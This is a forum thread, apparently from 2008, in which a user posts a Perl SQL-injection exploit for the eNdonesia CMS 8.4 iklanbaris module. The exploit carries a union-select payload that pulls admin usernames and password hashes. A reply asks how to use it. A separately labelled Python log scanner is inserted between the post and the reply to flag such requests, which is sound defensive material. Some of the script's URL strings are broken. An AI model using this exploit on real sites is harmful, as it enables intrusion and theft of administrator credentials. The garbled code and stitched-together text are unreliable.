yadoy666 Script Learner
Number of posts: 121 Registration date: 20.09.07
Subject: eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi Thu Aug 28, 2008 8:16 pm
Code:
#!/usr/bin/perl
#=====================================================
#[x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit
#[x] Vendor : http://www.endonesia.org/
#[x] Bug : mod.php?mod=iklanbaris&op=viewlink&cid
#[x] Bugs Found at : 01-08-2008
#[x] Bugs Found By : YaDoY666
#[x] Author Blogs : http://yadoy666.blogspot.com/
#[x] Greets : Jack, n0c0py, odod, Jery Maheswara, x-sari, m4rtincornelis
#=====================================================
use HTTP::Request;
use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=iklanbaris&op=viewlink&cid=";
$sql_injection ="-1/**/union+select/**/000,concat(aid,0x3a,pwd),666/**/from+authors/*where admin 1";

if(!@ARGV) { &help;exit(1);}

sub help(){
    print "\n [x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit\n";
    print " [x]===============================================\n";
    print " [x] Use : perl $0 http://www.target.com/n";
    print " [x] Dont use \"http:///";
    print " [x] Exploit By : YaDoY666 http://yadoy666.blogspot.com/ \n";
    print " [x]===============================================\n";
    print " [x] YogyaFree - MainHack BrotherHood - Echo - Jasakom \n\n";
    print " [x] http://www.yadoy666.blogspot.com/n/n";
}

while (){
    my $target = $ARGV[0];
    my $exploit = "http:///;
    print "\n [-] Trying to inject $target ...\n\n";
    my $request = HTTP::Request->new(GET=>$exploit);
    my $useragent = LWP::UserAgent->new();
    $useragent->timeout(10);
    my $response = $useragent->request($request);
    if ($response->is_success){
        my $res = $response->content;
        if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
            my ($username,$passwd) = ($1,$2);
            print " [target] $target \n";
            print " [loginx] $username:$passwd \n\n";
            exit(0);
        }
        else {
            die " [error] Fail to get username and password.\n\n";
        }
    }
    else {
        die " [error] Fail to inject $target \n\n";
    }
}
# YaDoY666's blog
# http://yadoy666.blogspot.com
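For defenders reviewing web-server logs of an affected site, the following is an added example (not part of the original post or of eNdonesia) that flags requests to the `mod.php?mod=iklanbaris&op=viewlink` endpoint named in the script header whose `cid` is not a plain number. It assumes Apache combined-log style lines and that a legitimate `cid` is a decimal category id; the sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style (documentation IPs).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Aug/2008:20:10:02 +0700] "GET /mod.php?mod=iklanbaris&op=viewlink&cid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Aug/2008:20:16:41 +0700] "GET /mod.php?mod=iklanbaris&op=viewlink&cid=-1/**/union+select/**/1,2,3 HTTP/1.1" 200 734',
    '198.51.100.7 - - [28/Aug/2008:20:17:05 +0700] "GET /mod.php?mod=news&op=view&id=abc HTTP/1.1" 200 2210',
    '192.0.2.44 - - [28/Aug/2008:20:18:30 +0700] "GET /index.php HTTP/1.1" 200 9100',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate cid is a plain decimal category id.
VALID_CID = re.compile(r"[0-9]{1,10}")


def suspicious_cid(log_line):
    """Return (client_ip, [bad cid values]) for a flagged request, else None."""
    m = REQUEST_RE.match(log_line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/mod.php"):
        return None
    # parse_qs percent-decodes and maps '+' to a space, so values are checked decoded.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("mod") != ["iklanbaris"] or params.get("op") != ["viewlink"]:
        return None
    bad = [v for v in params.get("cid", []) if not VALID_CID.fullmatch(v)]
    return (client, bad) if bad else None


def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(suspicious_cid, lines) if hit]


if __name__ == "__main__":
    for client, values in scan(SAMPLE_LOG):
        print(f"{client}: non-numeric cid {values!r}")
```

The same allow-list check (accept `cid` only if it is an integer) is the input validation the endpoint itself needs, together with a parameterized query.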
Hardc0py Noobies
Number of posts: 13 Registration date: 19.11.08
Subject: Re: eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi Wed Nov 19, 2008 12:33 am
Wow, bro yadoy, how do you use and understand that source code?
Please teach me.
I'm still really confused and don't understand it.
Thanks in advance.